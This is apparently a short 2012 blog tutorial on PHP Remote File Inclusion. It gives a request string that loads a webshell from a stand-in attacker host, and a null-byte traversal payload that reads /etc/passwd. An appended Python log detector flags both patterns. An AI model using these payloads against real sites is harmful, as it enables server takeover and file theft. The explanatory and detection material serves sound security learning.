Irregular Expressions

Aug 29 2012   7:50PM GMT

Remote File Inclusions



Posted by: Dan O'Connor

I am currently testing a few PHP shells that I have against a test PHP site I created, and I thought I would share some of the basics of an RFI (Remote File Inclusion). When I need to deal with web apps, this is the second thing I will try, right after SQL injection.

Here is the Wikipedia article for another explanation.

In most cases I would use this to either display the contents of a file or execute another PHP script, like a PHP-based shell. If I am not really sure what I am looking for, I will use a PHP-based shell, something like this.

Typically what I will do is crawl the site, look for variables on each page, and attempt something like this (borrowed from the Wikipedia example).

/vulnerable.php?COLOR=http://evil.example.com/webshell.txt?

A very simple and powerful method to attack sites.
It can also be used for local file traversal: instead of a remote file, you can specify a local file.

/vulnerable.php?COLOR=/etc/passwd%00

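In these cases the %00, a URL-encoded null byte, is very important for your success: it cuts off anything the script appends to the value, such as a file extension.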
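From the defender's side, both request shapes above can be spotted in web server logs. The following is an added example, not code from the original post: it decodes each query parameter and flags values that are themselves URLs, contain a null byte, or walk up the directory tree. The function names, finding labels, scheme list and sample requests are assumptions made for the illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample request targets (not real traffic). The first two are
# the request shapes quoted in the post; the rest are added for contrast.
SAMPLE_REQUESTS = [
    "/vulnerable.php?COLOR=http://evil.example.com/webshell.txt?",
    "/vulnerable.php?COLOR=/etc/passwd%00",
    "/vulnerable.php?COLOR=blue",
    "/vulnerable.php?COLOR=..%2F..%2Fetc%2Fpasswd",
    "/vulnerable.php?COLOR=/etc/passwd%2500",  # double-encoded null byte
]

# Illustrative scheme list, chosen for this example: a parameter value that is
# itself a URL is the remote-inclusion shape.
REMOTE_SCHEME = re.compile(r"^(?:https?|ftp|php|data)://", re.IGNORECASE)


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is also seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(request_target):
    """Return sorted (parameter, finding) pairs for one request target."""
    findings = set()
    query = urlsplit(request_target).query
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(raw)
        if REMOTE_SCHEME.match(value):
            findings.add((name, "remote-url"))
        if "\x00" in value:
            findings.add((name, "null-byte"))
        if "../" in value or "..\\" in value:
            findings.add((name, "path-traversal"))
    return sorted(findings)


if __name__ == "__main__":
    for target in SAMPLE_REQUESTS:
        print(target, "->", classify(target) or "clean")
```

A hit is a triage signal rather than proof of compromise, since legitimate redirect or callback parameters also carry URLs.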
